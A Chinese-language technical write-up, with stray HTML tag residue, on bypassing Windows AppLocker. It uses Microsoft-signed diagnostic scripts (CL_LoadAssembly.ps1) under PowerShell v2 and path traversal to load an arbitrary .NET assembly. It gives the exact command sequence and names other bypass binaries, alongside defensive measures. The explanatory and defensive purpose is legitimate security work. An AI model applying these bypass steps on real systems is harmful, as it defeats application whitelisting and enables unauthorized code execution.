利用PowerShell诊断脚本绕过AppLocker的技术分析<\/h1>

概述<\/h2>
本文详细分析如何利用Windows系统内置的诊断脚本(`CL_Invocation.ps1<\/code>和CL_LoadAssembly.ps1<\/code>)来执行命令并绕过AppLocker限制的技术。这些脚本位于%systemroot%\diagnostics\system\<\/code>目录下，具有微软的数字签名，因此在默认情况下被系统信任。<\/p>`

关键脚本分析<\/h2>
CL_Invocation.ps1<\/h3>
位置<\/strong>：%systemroot%\diagnostics\system\AERO\<\/code>或%systemroot%\diagnostics\system\Audio\<\/code><\/p>
功能<\/strong>：<\/p>

提供SyncInvoke<\/code>函数<\/li>
通过System.Diagnostics.Process<\/code>执行二进制文件<\/li>
<\/ul>
使用方法<\/strong>：<\/p>
. CL_Invocation.ps1  # 或 import-module CL_Invocation.ps1<\/span>
<\/span><\/span>SyncInvoke <command> <arg...>
<\/span><\/span><\/code><\/pre>限制<\/strong>：<\/p>

PowerShell约束语言模式(PSv5)会阻止执行<\/li>
默认AppLocker策略会阻止非特权账户执行未签名二进制文件<\/li>
<\/ul>
CL_LoadAssembly.ps1<\/h3>
位置<\/strong>：同上<\/p>
功能<\/strong>：<\/p>

提供两个加载.NET\/C#程序集(DLL\/EXE)的函数：

LoadAssemblyFromNS<\/code>：从命名空间加载<\/li>
LoadAssemblyFromPath<\/code>：从文件路径加载<\/li>
<\/ul>
<\/li>
<\/ul>
绕过AppLocker的技术实现<\/h2>
准备工作<\/h3>


准备一个简单的C#程序集(以.NET 2.0为目标框架)，例如funrun.exe<\/code>，其功能是通过proc.start()<\/code>运行calc.exe<\/code><\/p>
<\/li>

在启用默认AppLocker规则的Windows系统上测试：<\/p>

直接运行funrun.exe<\/code>会被阻止<\/li>
在PowerShell v5中运行也会被阻止<\/li>
<\/ul>
<\/li>
<\/ol>
绕过步骤<\/h3>


调用PowerShell版本2(必须已启用)：<\/p>
powershell -v 2 -ep bypass
<\/span><\/span><\/code><\/pre><\/li>

导航到诊断脚本目录：<\/p>
cd C:\windows\diagnostics\system\AERO
<\/span><\/span><\/code><\/pre><\/li>

导入模块：<\/p>
import-module .\CL_LoadAssembly.ps1
<\/span><\/span><\/code><\/pre><\/li>

通过路径遍历加载程序集：<\/p>
LoadAssemblyFromPath ..\..\..\..\temp\funrun.exe
<\/span><\/span><\/code><\/pre><\/li>

调用程序集方法：<\/p>
[funrun.hashtag]<\/span>::winning()
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
技术原理<\/h2>


数字签名信任<\/strong>：这些脚本具有微软的数字签名，被系统视为可信<\/p>
<\/li>

路径遍历<\/strong>：利用相对路径访问系统目录外的程序集文件<\/p>
<\/li>

PowerShell版本差异<\/strong>：PowerShell v2的安全限制较少，可以绕过约束语言模式<\/p>
<\/li>

程序集加载<\/strong>：通过.NET程序集加载机制绕过AppLocker对可执行文件的直接限制<\/p>
<\/li>
<\/ol>
防御措施<\/h2>


禁用PowerShell v2（如果不需要）<\/p>
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
<\/span><\/span><\/code><\/pre><\/li>

限制对%systemroot%\diagnostics\system\<\/code>目录的访问<\/p>
<\/li>

监控PowerShell v2的使用情况<\/p>
<\/li>

实施更严格的AppLocker规则，包括对.NET程序集加载的限制<\/p>
<\/li>

启用PowerShell脚本块日志记录和约束语言模式<\/p>
<\/li>
<\/ol>
替代方法<\/h2>
如果上述方法不可行，可以参考"Ultimate AppLocker Bypass List"中列出的其他绕过技术，包括但不限于：<\/p>

使用InstallUtil<\/li>
使用Regsvr32<\/li>
使用Mshta<\/li>
使用Cscript\/Wscript<\/li>
<\/ul>
结论<\/h2>
利用系统内置的信任组件是绕过安全限制的有效方法。安全团队应全面了解系统内置工具的功能，并实施纵深防御策略来应对此类技术。定期审计系统上的脚本和二进制文件，限制不必要的功能，并监控异常活动是防御此类攻击的关键。<\/p>